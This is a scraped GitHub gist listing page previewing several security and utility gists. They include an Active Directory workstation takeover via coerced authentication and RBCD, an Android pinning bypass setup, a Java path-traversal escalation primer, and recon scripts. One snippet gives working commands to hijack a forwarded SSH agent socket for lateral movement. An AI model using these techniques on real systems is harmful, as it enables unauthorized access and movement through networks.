Skip to content

Instantly share code, notes, and snippets.

View its0x08's full-sized avatar
☣️

0x08 its0x08

☣️
View GitHub Profile
@SkyyySi
SkyyySi / youtube-vanced-alternatives.md
Last active July 18, 2024 02:57
A list of alternatives after the shutdown of Vanced

NONE OF THESE CLIENTS ARE VERIFIED BY ME FOR SECURITY OR ANYTHING ELSE! USE AT YOUR OWN RISK!

These are the current alternatives (with links when possible):

@gladiatx0r
gladiatx0r / Workstation-Takeover.md
Last active June 23, 2024 22:01
From RPC to RCE - Workstation Takeover via RBCD and MS-RPChoose-Your-Own-Adventure

Overview

In the default configuration of Active Directory, it is possible to remotely take over Workstations (Windows 7/10/11) and possibly servers (if Desktop Experience is installed) when their WebClient service is running. This is accomplished in short by;

  • Triggering machine authentication over HTTP via either MS-RPRN or MS-EFSRPC (as demonstrated by @tifkin_). This requires a set of credentials for the RPC call.
  • Relaying that machine authentication to LDAPS for configuring RBCD
  • RBCD takeover

The caveat to this is that the WebClient service does not automatically start at boot. However, if the WebClient service has been triggered to start on a workstation (for example, via some SharePoint interactions), you can remotely take over that system. In addition, there are several ways to coerce the WebClient service to start remotely which I cover in a section below.

@approovm
approovm / 00-android-bypass-certificate-pinning-and-mitm-attack-setup.md
Last active July 2, 2024 19:10
Certificate Pinning Bypassing: Setup with Frida, mitmproxy and Android Emulator with a writable file system

Here's one of my favorite techniques for lateral movement: SSH agent forwarding. Use a UNIX-domain socket to advance your presence on the network. No need for passwords or keys.

root@bastion:~# find /tmp/ssh-* -type s
/tmp/ssh-srQ6Q5UpOL/agent.1460

root@bastion:~# SSH_AUTH_SOCK=/tmp/ssh-srQ6Q5UpOL/agent.1460 ssh user@internal.company.tld

user@internal:~$ hostname -f
internal.company.tld
@cihanmehmet
cihanmehmet / subdomain_wordlist.md
Last active June 16, 2024 10:01
Subdomain Wordlist
@harisec
harisec / exploit_path_traversals_in_Java_webapps.txt
Created April 27, 2020 10:24
quick primer on how to exploit path traversals in Java web apps (i.e. you can read WEB-INF/web.xml)
so, you can read WEB-INF/web.xml. how can you escalate this issue?
[step 1]. try to read other common Java files such as WEB-INF/web-jetty.xml.
use a specialized wordlist such as the following (from Sergey Bobrov/BlackFan):
https://github.com/BlackFan/WEB-INF-dict/blob/master/web-inf.txt
with time you can build your own wordlist adding files you've discovered over time.
use Burp Intruder for this, it's perfect for this job.
sort Intruder results by status code so you can see instantly which files were found.
@payloadartist
payloadartist / firefox.sh
Last active February 6, 2021 20:42
Enumerate sub-domains, then open them in Firefox automatically. Useful for taking a quick glance at target's assets, and make notes, while doing recon.
# ------Instructions---------
# Install (and configure) subfinder, assetfinder, and httprobe
# go get -v github.com/projectdiscovery/subfinder/cmd/subfinder && go get -v github.com/tomnomnom/httprobe && go get -v github.com/tomnomnom/assetfinder
# cat firefox.sh >> ~/.bashrc
# source ~/.bashrc
# Usage - subf_ff target.tld
# asset_ff target.tld
subf_ff () {
subfinder -d $1 -silent -t 100 | httprobe -c 50 | sort -u | while read line; do firefox $line; sleep 10; done
@dwisiswant0
dwisiswant0 / st8out.sh
Last active February 17, 2024 16:48
St8out - Extra one-liner for reconnaissance
#!/bin/bash
#####
#
# St8out - Extra one-liner for reconnaissance
#
# Usage: ./st8out.sh target.com
#
# Resources:
# - https://github.com/j3ssie/metabigor
@dianjuar
dianjuar / i3-shortcuts-screenshot.md
Last active July 9, 2024 11:26
My i3 shortcuts to take screenshots

Requirements

  • maim
  • xclip

Set-up

Set this on your i3 config file ~/.i3/config

# Screenshots